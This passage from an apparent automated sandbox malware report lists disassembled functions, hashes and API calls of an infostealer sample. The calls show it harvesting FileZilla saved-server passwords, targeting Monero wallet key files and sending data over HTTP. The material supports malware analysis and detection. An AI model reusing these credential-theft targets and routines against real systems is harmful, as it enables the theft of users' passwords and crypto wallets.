                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4bc4abcd568aeee2d273c9777c8352be9bbf1fc443753ee8b6f1b979bcb1379c
                            • Instruction ID: 1a06b1bb03dd710bbbe17ca40d29c0c949fa5d60098ab38cbd86b6aa4a2f74a6
                            • Opcode Fuzzy Hash: 4bc4abcd568aeee2d273c9777c8352be9bbf1fc443753ee8b6f1b979bcb1379c
                            • Instruction Fuzzy Hash: 78414DF3A181101BF31CA92EDC15776BAD6DBD0324F16823EDB85C77C8EC7A4805869A
                            Function 008FDA6E Relevance: .1, Instructions: 128COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12211658c1501451a36fb3799bd3132ba43d11b85cd5cfeb62d8cca329864380
                            • Instruction ID: 2de905e918f258061688e57dd47d3e377d5f5790074638978c5cfa3c2f74c931
                            • Opcode Fuzzy Hash: 12211658c1501451a36fb3799bd3132ba43d11b85cd5cfeb62d8cca329864380
                            • Instruction Fuzzy Hash: C1415AF3A487088BF304AE39DD85366BBD6DB94320F1A863DD794C3788ED7985058646
                            Function 009BA8A3 Relevance: .1, Instructions: 87COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bec8996bbee730d8eff4646034fff08019fa876f7fbaea3f01cb1fd28f70d1f4
                            • Instruction ID: b11152e45fa7583f6abb92451f028e57fccd3be34b957c4782deedf5e9737d09
                            • Opcode Fuzzy Hash: bec8996bbee730d8eff4646034fff08019fa876f7fbaea3f01cb1fd28f70d1f4
                            • Instruction Fuzzy Hash: 7F31E2B210C704EFE309BF19ECC5AAEFBE5FB58314F16492DE2D582650E735A4408A47
                            Function 00579750 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 00570250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00580DBA,00580DB7,00580DB6,00580DB3), ref: 00570362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00570369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00570385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 005703CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 005703DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00570419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00570463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 0057051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 00570532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 0057054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00570562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00570571
                            • lstrcat.KERNEL32(?,url: ), ref: 00570580
                            • lstrcat.KERNEL32(?,00000000), ref: 00570593
                            • lstrcat.KERNEL32(?,00581678), ref: 005705A2
                            • lstrcat.KERNEL32(?,00000000), ref: 005705B5
                            • lstrcat.KERNEL32(?,0058167C), ref: 005705C4
                            • lstrcat.KERNEL32(?,login: ), ref: 005705D3
                            • lstrcat.KERNEL32(?,00000000), ref: 005705E6
                            • lstrcat.KERNEL32(?,00581688), ref: 005705F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00570604
                            • lstrcat.KERNEL32(?,00000000), ref: 00570617
                            • lstrcat.KERNEL32(?,00581698), ref: 00570626
                            • lstrcat.KERNEL32(?,0058169C), ref: 00570635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00580DB2), ref: 0057068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: a5d78ccab7364ed9d60e58ea2653b4eda049c32a879ba5641e4611680dd572a3
                            • Instruction ID: 2e102ede5453785557d5f255ff6024bb075561927b3a60fe52e99d87f037808f
                            • Opcode Fuzzy Hash: a5d78ccab7364ed9d60e58ea2653b4eda049c32a879ba5641e4611680dd572a3
                            • Instruction Fuzzy Hash: E1D11E71900109ABCB04FBF4ED9ADEE7B78BF94300F40C418F506A6095EF74AA46DB66
                            Function 00565960 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                              • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005659F8
                            • StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00565A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00565B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E4E988,00000000,?,00E4A870,00000000,?,00581A1C), ref: 00565E71
                            • lstrlen.KERNEL32(00000000), ref: 00565E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00565E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00565E9A
                            • lstrlen.KERNEL32(00000000), ref: 00565EAF
                            • lstrlen.KERNEL32(00000000), ref: 00565ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00565EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00565F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00565F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00565F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00565FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00565FBD
                            • HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00565BF8
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • InternetCloseHandle.WININET(00000000), ref: 00565FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------$
                            • API String ID: 874700897-1076418438
                            • Opcode ID: 6a40e92a1c38427e28cc5fe6cf07caf264ed2e6df08239c7754d7ff96c8a7c43
                            • Instruction ID: e0f6bfb4cb1ed32ce7b122f5578b7dba744a3cab1f7bd2a9d5b2865a46c47345
                            • Opcode Fuzzy Hash: 6a40e92a1c38427e28cc5fe6cf07caf264ed2e6df08239c7754d7ff96c8a7c43
                            • Instruction Fuzzy Hash: BF121172820119ABDB15EBA0EC99FEEB778BFD4700F408159F11A72091EF702A49DF56
                            Function 0056CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0056D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0056D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D208
                            • lstrcat.KERNEL32(?,00581478), ref: 0056D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D22A
                            • lstrcat.KERNEL32(?,0058147C), ref: 0056D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D24C
                            • lstrcat.KERNEL32(?,00581480), ref: 0056D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D26E
                            • lstrcat.KERNEL32(?,00581484), ref: 0056D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D290
                            • lstrcat.KERNEL32(?,00581488), ref: 0056D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D2B2
                            • lstrcat.KERNEL32(?,0058148C), ref: 0056D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0056D2D4
                            • lstrcat.KERNEL32(?,00581490), ref: 0056D2E3
                              • Part of subcall function 0057A820: lstrlen.KERNEL32(00564F05,?,?,00564F05,00580DDE), ref: 0057A82B
                              • Part of subcall function 0057A820: lstrcpy.KERNEL32(00580DDE,00000000), ref: 0057A885
                            • lstrlen.KERNEL32(?), ref: 0056D32A
                            • lstrlen.KERNEL32(?), ref: 0056D339
                              • Part of subcall function 0057AA70: StrCmpCA.SHLWAPI(00E491F8,0056A7A7,?,0056A7A7,00E491F8), ref: 0057AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0056D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 1668dca4c03477c6629b41e61d7cfae50dd0bf45b04513a710399d0b2099c82e
                            • Instruction ID: 4c37c01e677902afa10f40582528cd068a6244a4954d36651f66a4d47283c0c6
                            • Opcode Fuzzy Hash: 1668dca4c03477c6629b41e61d7cfae50dd0bf45b04513a710399d0b2099c82e
                            • Instruction Fuzzy Hash: A9E11171910109ABCB04EBA0ED9AEEE7B78BFD4301F108554F50AB7091DF39AA05DB66
                            Function 0056C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E4CE70,00000000,?,0058144C,00000000,?,?), ref: 0056CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0056CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0056CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0056CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0056CAD9
                            • StrStrA.SHLWAPI(?,00E4CF90,00580B52), ref: 0056CAF7
                            • StrStrA.SHLWAPI(00000000,00E4CEE8), ref: 0056CB1E
                            • StrStrA.SHLWAPI(?,00E4D660,00000000,?,00581458,00000000,?,00000000,00000000,?,00E49248,00000000,?,00581454,00000000,?), ref: 0056CCA2
                            • StrStrA.SHLWAPI(00000000,00E4D900), ref: 0056CCB9
                              • Part of subcall function 0056C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0056C871
                              • Part of subcall function 0056C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0056C87C
                            • StrStrA.SHLWAPI(?,00E4D900,00000000,?,0058145C,00000000,?,00000000,00E491B8), ref: 0056CD5A
                            • StrStrA.SHLWAPI(00000000,00E48FC8), ref: 0056CD71
                              • Part of subcall function 0056C820: lstrcat.KERNEL32(?,00580B46), ref: 0056C943
                              • Part of subcall function 0056C820: lstrcat.KERNEL32(?,00580B47), ref: 0056C957
                              • Part of subcall function 0056C820: lstrcat.KERNEL32(?,00580B4E), ref: 0056C978
                            • lstrlen.KERNEL32(00000000), ref: 0056CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0056CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: de872f1ef3693325eb4007a7c3452ed64bbe6a5c3110a0a64e2fdc75b52ae221
                            • Instruction ID: e96502901f52643d34dace79c5f280a7dee691c501a2a6a4be7951c29cb44a9a
                            • Opcode Fuzzy Hash: de872f1ef3693325eb4007a7c3452ed64bbe6a5c3110a0a64e2fdc75b52ae221
